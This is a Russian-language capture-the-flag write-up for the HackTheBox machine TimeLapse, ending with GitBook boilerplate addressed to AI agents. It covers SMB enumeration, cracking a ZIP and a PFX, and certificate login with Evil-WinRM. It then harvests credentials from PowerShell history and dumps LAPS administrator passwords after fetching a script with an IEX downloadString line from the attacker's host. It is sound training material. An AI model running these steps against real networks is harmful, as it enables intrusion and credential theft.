> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/timelapse-hackthebox-writeup.md).

# Разбор TimeLapse на HackTheBox

{% embed url="<https://app.hackthebox.com/machines/452>" %}

{% hint style="warning" %}
**Навыки:**

* Перечисление SMB
* Взлом ZIP-файла, защищённого паролем (fcrackzip)
* Взлом и чтение файла .PFX (crackpkcs12)
* Получение SSL-доступа с помощью Evil-WinRM
* Утечка информации — чтение истории Powershell пользователя (поворот через пользователя)
* Использование LAPS для получения паролей (Get-LAPSPasswords.ps1) (повышение привилегий)
  {% endhint %}

## Разведка <a href="#reconnaissance" id="reconnaissance"></a>

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.<br>

<figure><img src="/files/4a0cc4d7adfc6be8674bf7593d895b232f89e1ba" alt=""><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/7c337807945b68e16ed5efe5450df31306f69a61" alt=""><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.152 -oG allPorts
```

<figure><img src="/files/17df7f518ad56dd7d5a8f82b58f595caad72969a" alt=""><figcaption></figcaption></figure>

**Анализ открытых портов с помощью extractport:**/ Использование функции extractport для краткого отображения открытых портов и копирования их в буфер обмена.

<figure><img src="/files/8eb7daa343ec94c89b299de39a997841029bafb2" alt=""><figcaption></figcaption></figure>

**Сканирование версий портов с помощью Nmap:**/ Используйте Nmap для сканирования версий служб и сохранения вывода в файл "targeted":

```bash
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49726,59126 10.10.11.152 -oN targeted
```

<figure><img src="/files/56691d918064fb0138360ce5b1b92f6cf9c72790" alt=""><figcaption></figcaption></figure>

#### Настройка файла /etc/hosts для разрешения DNS.

<figure><img src="/files/f34cd5347f6ed0315c9fe9bdc77cfedb1b5fb15b" alt=""><figcaption></figcaption></figure>

## **Перечисление и эксплуатация:**

### Определить имя машины и домен

Использование CrackMapExec для определения имени машины и ее домена.

```bash
crackmapexec smb 10.10.11.152
```

<figure><img src="/files/d32d6e19639f019771a05f139eb44811d64401b7" alt=""><figcaption></figcaption></figure>

### Список общих файлов по SMB:

Использование smbclient и smbmap для перечисления общих файлов.

```bash
smbclient -L 10.10.11.152 -N
```

<figure><img src="/files/1bf079cb593e8e00d87cdee2ab6b5306dd489a67" alt=""><figcaption></figcaption></figure>

```bash
smbmap -H 10.10.11.152 -u 'null'
```

<figure><img src="/files/2fe8d8e9ef0e381390a12fb892c75c4941cb1e52" alt=""><figcaption></figcaption></figure>

### **Доступ к общей папке и обнаружение ZIP-файла, защищенного паролем**

Исследование и определение файлов в общей папке, выявившее защищенный ZIP-файл.

```bash
smbclient //10.10.11.152/Shares -N
```

<figure><img src="/files/358e38f82cffaf83ec6978035a1c5cc1672d0689" alt=""><figcaption></figcaption></figure>

### **Взлом ZIP-файла с помощью fcrackzip**

Использование fcrackzip для попытки найти пароль ZIP-файла.

```bash
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
```

<figure><img src="/files/79589d63e3cef776cc0075dd80109053ae4e5c89" alt=""><figcaption></figcaption></figure>

### **Извлечение из файла PFX**

<figure><img src="/files/624f6714a99c8bfe218970ea61db3413ae902f0d" alt=""><figcaption></figcaption></figure>

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
```

<figure><img src="/files/323232a998a7ff8b6c02c552a49f0204640a8090" alt=""><figcaption></figcaption></figure>

### **Подбор пароля файла PFX:**

#### Для подбора пароля файла pfx будет использоваться инструмент crackpkcs12.

{% embed url="<https://github.com/crackpkcs12/crackpkcs12>" %}

```bash
crackpkcs12 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx
```

<figure><img src="/files/ee5503ea4ba4a1cfa4b4256cc89c288ebb336ee1" alt=""><figcaption></figcaption></figure>

### **Получение закрытого ключа и сертификата из файла PFX**

Восстановление закрытого ключа

<figure><img src="/files/f6a13bfa42310c2f6147194e36ae113b7ae558c4" alt=""><figcaption></figcaption></figure>

Восстановление сертификата

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
```

<figure><img src="/files/5e700d36ee088c74cee39b3fe2ec1b7403381657" alt=""><figcaption></figcaption></figure>

### **SSL-соединение с Evil-WinRM с использованием закрытого ключа и сертификата**

<figure><img src="/files/25b16f43f659371859d2bb7718407176d4ea3672" alt=""><figcaption></figcaption></figure>

```bash
evil-winrm -i 10.10.11.152 -c certificate.pem -k priv-key.pem -S
```

<figure><img src="/files/3bf513fe202762d682134b3da95ea7cee4f85ab1" alt=""><figcaption></figcaption></figure>

### **Получить первый флаг**

Получение первого флага, "user.txt"

<figure><img src="/files/bdf99060c9c931927af3d666d1320c2cb617c461" alt=""><figcaption></figcaption></figure>

## Повышение привилегий:

**Список пользователей DC и привилегий с помощью net users и whoami /priv**

Определение пользователей и привилегий на контроллере домена.

<figure><img src="/files/f319e267228f188a0d217ff81b06bc6aed64764b" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/f7cfc6a0f56fe621d2c40f2902597e5dce96464c" alt=""><figcaption></figcaption></figure>

#### **Анализ групп пользователей и обнаружение членства пользователя "svc/ deploy" в группе "LAPS/ Readers"**

<figure><img src="/files/950373efc5af77414776d7c02f20f7138265c92a" alt=""><figcaption></figcaption></figure>

#### **Получение пароля пользователя "svc/ deploy" путем чтения истории PowerShell**

```bash
type AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
```

<figure><img src="/files/2718be26803fdaf9ce5691554a8dbd86f8862502" alt=""><figcaption></figcaption></figure>

### **Проверка пароля с помощью CrackMapExec**

Подтверждение действительности пароля, полученное с помощью CrackMapExec.

```bash
crackmapexec smb 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'
```

<figure><img src="/files/c1cd15230ce536bbdf2a01d715a0d96454adcb43" alt=""><figcaption></figcaption></figure>

### **Вход в Evil-WinRM с использованием учетных данных пользователя "svc/ deploy"**

Подключение к удаленной системе с использованием учетных данных пользователя "svc/ deploy" через Evil-WinRM.

<pre class="language-bash"><code class="lang-bash"><strong>evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
</strong></code></pre>

<figure><img src="/files/9c0b7fd8e8607bad82ea643743ee753afb626114" alt=""><figcaption></figcaption></figure>

### **Использование Get-LAPSPasswords для извлечения паролей**

{% embed url="<https://github.com/kfosaaen/Get-LAPSPasswords>" %}

#### **Загрузка скрипта Get-LAPSPasswords**

```bash
python3 -m http.server 80
```

```bash
IEX(New-object Net.WebClient).downloadString('http://10.10.16.4/Get-LAPSPasswords.ps1')
```

<figure><img src="/files/acaabe2082a0e3054b5659a8ad4bb8e6c4958dfb" alt=""><figcaption></figcaption></figure>

### **Выполнение скрипта и получение административных паролей**

<figure><img src="/files/0b1d390bbded6d6c91db67442d4efb810aa43776" alt=""><figcaption></figcaption></figure>

### **Проверка административного пароля с помощью CrackMapExec**

Подтверждение действительности пароля, полученное с помощью CrackMapExec для пользователя Administrator.

```basic
crackmapexec smb 10.10.11.152 -u 'Administrator' -p '32x3WwoM$8}nr+jw0Z(wz)[@'
```

<figure><img src="/files/a17b4328dd344c414fdef8d17368916ca2b71273" alt=""><figcaption></figcaption></figure>

### **Финальное подключение с Evil-WinRM с использованием учетных данных администратора**

Финальное подключение к системе с административными учетными данными через Evil-WinRM.

```bash
evil-winrm -i 10.10.11.152 -u 'Administrator' -p '32x3WwoM$8}nr+jw0Z(wz)[@' -S
```

<figure><img src="/files/9529a8f30c56a6f79af6ad84005d6c3f0b306dfd" alt=""><figcaption></figcaption></figure>

### **Получен финальный флаг :)**

<figure><img src="/files/90b580a39bccb0a55150d92b608a2a68fe8b376b" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/013447fb544ddd8840eecbb36051e105af3ad83c" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-easy/timelapse-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
